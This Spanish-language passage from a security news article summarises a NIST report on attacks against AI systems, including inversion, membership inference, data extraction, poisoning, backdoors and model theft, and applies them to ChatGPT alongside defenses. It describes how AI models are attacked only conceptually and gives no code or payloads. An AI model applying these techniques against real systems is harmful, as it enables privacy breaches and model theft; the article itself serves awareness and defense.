    • Ejemplo : un atacante podría probar una herramienta de diagnóstico de salud de IA con datos específicos de un paciente. Si las predicciones del modelo son inusualmente precisas o ciertas, podría indicar que los datos del paciente formaban parte del conjunto de entrenamiento, lo que podría revelar información de salud confidencial.
  3. Extracción de datos de entrenamiento :
    • Detalle : aquí, el atacante pretende extraer puntos de datos reales del conjunto de datos de entrenamiento del modelo de IA. Esto se puede lograr analizando las respuestas del modelo a diversas entradas.
    • Ejemplo : un atacante podría interactuar con un modelo de lenguaje entrenado en documentos confidenciales y, mediante consultas cuidadosamente elaboradas, podría hacer que el modelo regurgite fragmentos de estos textos confidenciales.
  4. Ataques de reconstrucción :
    • Detalle : similar a la inversión del modelo, este ataque se centra en reconstruir los datos de entrada, a menudo de forma detallada y de alta fidelidad. Esto es particularmente factible en modelos que retienen mucha información sobre sus datos de entrenamiento.
    • Ejemplo : en un modelo generativo entrenado para producir imágenes basadas en descripciones, un atacante podría encontrar una manera de ingresar indicaciones específicas que hagan que el modelo genere imágenes muy parecidas a las del conjunto de entrenamiento, lo que podría revelar imágenes privadas o confidenciales.
  5. Ataques de inferencia de propiedad :
    • Detalle : estos ataques tienen como objetivo inferir propiedades o características de los datos de entrenamiento que el modelo no pretendía revelar. Esto podría exponer atributos o tendencias confidenciales en los datos.
    • Ejemplo : un atacante podría analizar el resultado de un modelo utilizado para evaluaciones de desempeño de los empleados para inferir características desprotegidas de los empleados (como género o raza), que podrían usarse con fines discriminatorios.
  6. Robo o extracción de modelos :
    • Detalle : en este caso, el atacante pretende replicar la funcionalidad de un modelo de IA propietario. Al consultar ampliamente el modelo y observar sus resultados, el atacante puede crear un modelo similar sin acceso a los datos de entrenamiento originales.
    • Ejemplo : un competidor podría utilizar la API pública de un modelo de aprendizaje automático para consultarlo sistemáticamente y utilizar las respuestas para entrenar un nuevo modelo que imite el original, robando efectivamente la propiedad intelectual.

SEGMENTACIÓN

Los ataques a sistemas de IA, incluido ChatGPT y otros modelos de IA generativa, se pueden categorizar aún más según la etapa del proceso de aprendizaje al que se dirigen (entrenamiento o inferencia) y el conocimiento y el nivel de acceso del atacante (caja blanca o caja negra). Aquí hay un desglose:

POR ETAPA DE APRENDIZAJE:

  1. Ataques durante la fase de entrenamiento :
    • Envenenamiento de datos : inyectar datos maliciosos en el conjunto de entrenamiento para comprometer el proceso de aprendizaje del modelo.
    • Ataques de puerta trasera : incorporar funcionalidades ocultas en el modelo durante el entrenamiento que pueden activarse mediante entradas específicas.
  2. Ataques durante la fase de inferencia :
    • Ataques adversarios : presentar entradas engañosas para engañar al modelo y hacer que cometa errores durante su operación.
    • Ataques de inversión y reconstrucción de modelos : intentar inferir o reconstruir datos de entrada a partir de las salidas del modelo.
    • Ataques de inferencia de membresía : determinar si se utilizaron datos específicos en el conjunto de entrenamiento observando el comportamiento del modelo.
    • Ataques de inferencia de propiedad : inferir propiedades de los datos de entrenamiento que no están destinadas a ser divulgadas.
    • Manipulación de salida : alterar la salida del modelo después de que se haya generado pero antes de que llegue al destinatario previsto.

POR CONOCIMIENTO Y ACCESO DEL ATACANTE:

  1. Ataques de caja blanca (el atacante tiene pleno conocimiento y acceso):
    • Model Tampering : Alteración directa de los parámetros o estructura del modelo.
    • Ataques de puerta trasera : Implantación de una puerta trasera durante el desarrollo del modelo, que el atacante puede explotar posteriormente.
    • Estos ataques requieren un conocimiento profundo de la arquitectura y los parámetros del modelo y, potencialmente, acceso al proceso de capacitación.
  2. Ataques de caja negra (el atacante tiene conocimiento y acceso limitados o nulos):
    • Ataques adversarios : creación de muestras de entrada diseñadas para que el modelo las clasifique o interprete erróneamente.
    • Ataques de inversión y reconstrucción de modelos : no requieren conocimiento del funcionamiento interno del modelo.
    • Ataques de inferencia de membresía y propiedad : basados ​​​​en la salida del modelo a ciertas entradas, sin conocimiento de su estructura interna.
    • Extracción de datos de entrenamiento : extracción de información sobre los datos de entrenamiento a través de una amplia interacción con el modelo.
    • Robo o extracción de modelos : replicar la funcionalidad del modelo observando sus entradas y salidas.

TRASCENDENCIA:

  • Los ataques en fase de entrenamiento a menudo requieren acceso interno o una violación significativa en la tubería de datos, lo que los hace menos comunes pero potencialmente más devastadores.
  • Los ataques de fase de inferencia son más accesibles para los atacantes externos, ya que a menudo pueden ejecutarse con un acceso mínimo al modelo.
  • Los ataques de caja blanca suelen ser más sofisticados y requieren un mayor nivel de acceso y conocimiento, a menudo limitados a personas internas o a través de importantes violaciones de seguridad.
  • Los ataques de caja negra son más comunes en escenarios del mundo real, ya que pueden ejecutarse con un conocimiento limitado sobre el modelo y sin acceso directo a sus componentes internos.

Comprender estas categorías ayuda a diseñar estrategias de defensa específicas para cada tipo de ataque, según las vulnerabilidades específicas y las etapas operativas del sistema de IA.

HACKEAR CHATGPT

El modelo ChatGPT AI, como cualquier sistema avanzado de aprendizaje automático, es potencialmente vulnerable a varios ataques, incluidos ataques a la privacidad y la integridad. Exploremos cómo estos ataques podrían usarse o se han usado contra ChatGPT, centrándonos en los ataques a la privacidad mencionados anteriormente:

  1. Ataques de inversión de modelos :
    • Uso potencial contra ChatGPT : un atacante podría intentar utilizar las respuestas de ChatGPT para inferir detalles sobre los datos con los que fue entrenado. Por ejemplo, si ChatGPT proporciona constantemente información detallada y precisa sobre un tema específico y menos conocido, podría indicar la presencia de datos sustanciales de capacitación sobre ese tema, lo que podría revelar la naturaleza de las fuentes de datos utilizadas.
  2. Ataques de inferencia de membresía :
    • Uso potencial contra ChatGPT : este tipo de ataque podría intentar determinar si un texto o tipo de texto en particular formaba parte de los datos de entrenamiento de ChatGPT. Al analizar las respuestas del modelo a consultas específicas, un atacante podría adivinar si ciertos datos se incluyeron en el conjunto de entrenamiento, lo que podría ser una preocupación si los datos de entrenamiento incluyeran información confidencial o privada.
  3. Extracción de datos de entrenamiento :
    • Uso potencial contra ChatGPT : dado que ChatGPT genera texto basado en patrones aprendidos de sus datos de entrenamiento, existe un riesgo teórico de que un atacante pueda manipular el modelo para generar segmentos de texto que se parezcan mucho o repliquen partes de sus datos de entrenamiento. Esto es particularmente delicado si los datos de entrenamiento contenían información confidencial o de propiedad exclusiva.
  4. Ataques de reconstrucción :
    • Uso potencial contra ChatGPT : similar a la inversión del modelo, los atacantes podrían intentar reconstruir los datos de entrada (como ejemplos de texto específicos) en los que se entrenó el modelo, en función de la información que el modelo proporciona en sus resultados. Sin embargo, dado el vasto y diverso conjunto de datos en el que se entrena ChatGPT, reconstruir datos de entrenamiento específicos puede ser un desafío.
  5. Ataques de inferencia de propiedad :
    • Uso potencial contra ChatGPT : los atacantes podrían analizar las respuestas de ChatGPT para inferir propiedades sobre sus datos de entrenamiento que no estén modeladas explícitamente. Por ejemplo, si el modelo muestra sesgos o tendencias en ciertas respuestas, podría revelar información no deseada sobre la composición o naturaleza de los datos de entrenamiento.
  6. Robo o extracción de modelos :
    • Uso potencial contra ChatGPT : esto implica consultar extensamente ChatGPT para comprender sus mecanismos subyacentes y luego usar esta información para crear un modelo similar. Un ataque de este tipo sería un intento de replicar las capacidades de ChatGPT sin acceso al modelo original ni a los datos de entrenamiento.


Los ataques a la integridad de modelos de IA como ChatGPT tienen como objetivo comprometer la precisión y confiabilidad de los resultados del modelo. Examinemos cómo estos ataques podrían usarse o se han usado contra el modelo ChatGPT, categorizados por la etapa de aprendizaje y el conocimiento del atacante:

ATAQUES DURANTE LA FASE DE ENTRENAMIENTO (WHITE-BOX):

  • Envenenamiento de datos : si un atacante obtiene acceso al proceso de capacitación, podría introducir datos maliciosos en el conjunto de capacitación de ChatGPT. Esto podría distorsionar la comprensión y las respuestas del modelo, llevándolo a generar contenido sesgado, incorrecto o dañino.
  • Ataques de puerta trasera : una persona con información privilegiada o alguien con acceso al proceso de capacitación podría implantar una puerta trasera en ChatGPT. Esta puerta trasera podría desencadenar respuestas específicas cuando se detecten ciertas entradas, que podrían usarse para difundir información errónea u otro contenido dañino.

ATAQUES DURANTE LA FASE DE INFERENCIA (CAJA NEGRA):

  • Ataques adversarios : consisten en presentar a ChatGPT entradas especialmente diseñadas que provocan que produzca resultados erróneos. Por ejemplo, un atacante podría encontrar una manera de formular preguntas o indicaciones que confundan constantemente al modelo y le hagan dar respuestas incorrectas o sin sentido.
  • Manipulación de salida : esto implicaría interceptar y alterar las respuestas de ChatGPT después de que se generan pero antes de que lleguen al usuario. Si bien esto es más un ataque al canal de comunicación que al modelo en sí, aún puede socavar la integridad de los resultados de ChatGPT.

IMPLICACIONES Y ESTRATEGIAS DE DEFENSA:

  • Durante la formación : Garantizar la seguridad y la integridad de los datos y el proceso de formación es fundamental. Las auditorías periódicas, la detección de anomalías y las prácticas seguras de manejo de datos son esenciales para mitigar estos riesgos.
  • Durante la inferencia : un diseño de modelo sólido para resistir las entradas del adversario, el monitoreo continuo de las respuestas y las arquitecturas de implementación seguras pueden ayudar a defenderse contra estos ataques.

EJEMPLOS E INQUIETUDES DEL MUNDO REAL:

  • Hasta la fecha, no se han divulgado públicamente casos de ataques de integridad exitosos específicamente contra ChatGPT. Sin embargo, existe la posibilidad de que se produzcan tales ataques, como lo demuestran las investigaciones académicas y industriales sobre las vulnerabilidades de la IA.
  • OpenAI, el creador de ChatGPT, emplea varias contramedidas como desinfección de entradas, monitoreo de resultados del modelo y actualización continua del modelo para abordar nuevas amenazas y vulnerabilidades.

En conclusión, si bien los ataques a la integridad representan una amenaza importante para los modelos de IA como ChatGPT, una combinación de estrategias de defensa proactivas y vigilancia continua es clave para mitigar estos riesgos.

Si bien estos tipos de ataques se aplican ampliamente a todos los sistemas de IA generativa, el informe señala que algunas vulnerabilidades son particularmente pertinentes para arquitecturas de IA específicas, como los sistemas de modelos de lenguaje grande (LLM) y de generación aumentada de recuperación (RAG). Estos modelos, que están a la vanguardia del procesamiento del lenguaje natural, son susceptibles a amenazas únicas debido a sus complejas capacidades de generación y procesamiento de datos.

Las implicaciones de estas vulnerabilidades son vastas y variadas y afectan a industrias que van desde la atención sanitaria hasta las finanzas e incluso la seguridad nacional. A medida que los sistemas de IA se integran más en la infraestructura crítica y las aplicaciones cotidianas, la necesidad de medidas sólidas de ciberseguridad se vuelve cada vez más urgente.

El informe del NIST sirve como un llamado de atención para que la industria de la inteligencia artificial, los profesionales de la ciberseguridad y los formuladores de políticas prioricen el desarrollo de mecanismos de defensa más sólidos contra estas amenazas emergentes. Esto incluye no sólo soluciones tecnológicas sino también marcos regulatorios y directrices éticas para regir el uso de la IA.

En conclusión, el informe es un recordatorio oportuno de la naturaleza de doble filo de la tecnología de inteligencia artificial. Si bien ofrece un inmenso potencial de progreso e innovación, también trae consigo nuevos desafíos y amenazas que deben abordarse con vigilancia y previsión. A medida que seguimos ampliando los límites de lo que la IA puede lograr, garantizar la seguridad y la integridad de estos sistemas sigue siendo una preocupación primordial para un futuro en el que la tecnología y la humanidad puedan coexistir en armonía.

El cargo 11 formas de hackear ChatGpt y sistemas de IA generativa apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente